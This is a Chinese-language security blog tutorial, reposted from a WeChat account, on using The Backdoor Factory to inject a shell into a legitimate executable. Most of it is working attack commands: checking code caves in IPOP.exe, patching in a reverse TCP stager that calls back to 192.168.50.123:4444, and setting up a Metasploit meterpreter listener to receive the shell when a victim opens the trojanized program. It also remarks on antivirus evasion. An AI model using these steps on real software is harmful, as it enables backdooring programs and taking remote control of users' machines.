利用The Backdoor Factory给软件添加Shell

admin 2022年8月4日11:06:03安全文章评论4 views1087字阅读3分37秒阅读模式

The Backdoor Factory即后门工厂,是一款简单实用的后门构造工具,支持Windows PE和Linux ELF两种运行机制的可执行文件,BDF的目标是让攻击者所提供的shell代码对可执行二进制文件进行补丁,在正常运行的软件中添加shell。

其原理是在可执行二进制文件中有大量的00,这些00是不包含数据的即无意义的,那么就可以将这些数据替换成payload,并且在程序执行的时候,JMP到代码段来触发payload

🎡工具特点:

  • 目标文件会被拷贝并且打上补丁
  • 注入反弹脚本
  • 修改PE/COFF头以为所有的WIN32 DLL增加附加选项 Kali官网中的介绍:https://tools.kali.org/exploitation-tools/backdoor-factory

项目地址:https://github.com/secretsquirrel/the-backdoor-factory

🍉牛刀小试

#下载项目
git clone https://github.com/secretsquirrel/the-backdoor-factory.git
#帮助文档
./
backdoor.py -h

检测是否支持后门植入,这里以IPOP.exe为例:

./backdoor.py -f ~/IPOP.exe -S

利用The Backdoor Factory给软件添加Shell测试裂缝空间size 150

./backdoor.py -f ~/IPOP.exe -c -l 150

利用The Backdoor Factory给软件添加Shell查看可用payload:

./backdoor.py -f ~/IPOP.exe -s show

利用The Backdoor Factory给软件添加Shell插入payload,并生成文件:

./backdoor.py -f ~/IPOP.exe -H 192.168.50.123 -P 4444 -s iat_reverse_tcp_stager_threaded

利用The Backdoor Factory给软件添加Shell在msf中开启本地监听:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.50.123
set lport 4444
exploit 
-j

当我们打开软件时,在msf中也会得到反弹。

🏀总结

利用BDF我们可以很轻松的在exe文件中植入后门。对初学者来说很友好,但是其缺点也很明显,就是程序中必须存在大量的00,这对植入的软件也就有了要求,并不是所有的软件都可植入,同时在测试过程中发现免杀效果也不是很好。但是对于我们学习和研究足够了。

利用The Backdoor Factory给软件添加Shell
更多精彩文章 关注我们


原文始发于微信公众号(kali黑客笔记):利用The Backdoor Factory给软件添加Shell

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月4日11:06:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  利用The Backdoor Factory给软件添加Shell http://cn-sec.com/archives/1221142.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: